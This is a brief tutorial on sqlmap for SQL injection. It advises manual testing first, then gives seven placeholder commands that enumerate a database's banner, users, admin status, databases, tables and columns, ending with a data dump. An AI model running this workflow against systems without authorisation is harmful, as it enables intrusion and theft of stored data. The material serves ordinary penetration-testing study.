Information Gathering with sqlmap

Step 0: Test injection by hand first.

This is good practice for honing one's own skills.

In addition, sqlmap is just a tool: run fully automatically without prior manual testing, it can choose a very inefficient exploitation strategy. It is also a dangerous tool that can crash the remote service if used incorrectly.

Step 1: Extract the database banner

sqlmap -u <target> --banner <other_options>

Step 2: List users of the database

sqlmap -u <target> --users <other_options>

Step 3: Check if database user is administrator

sqlmap -u <target> --is-dba <other_options>

Step 4: List available databases

sqlmap -u <target> --dbs <other_options>

Step 5: List tables of selected database

sqlmap -u <target> -D <database> --tables <other_options>

Step 6: List columns of one or more tables

sqlmap -u <target> -D <database> -T <table,table> --columns <other_options>

Step 7: Dump columns

sqlmap -u <target> -D <database> -T <table> -C <column,column> --dump <other_options>